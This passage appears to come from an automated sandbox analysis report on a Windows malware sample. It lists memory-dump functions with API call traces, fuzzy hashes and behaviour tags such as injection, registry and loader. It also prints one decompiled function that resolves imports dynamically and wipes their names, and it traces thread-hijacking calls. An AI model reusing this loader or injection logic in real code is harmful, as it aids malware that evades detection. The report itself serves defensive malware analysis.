  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
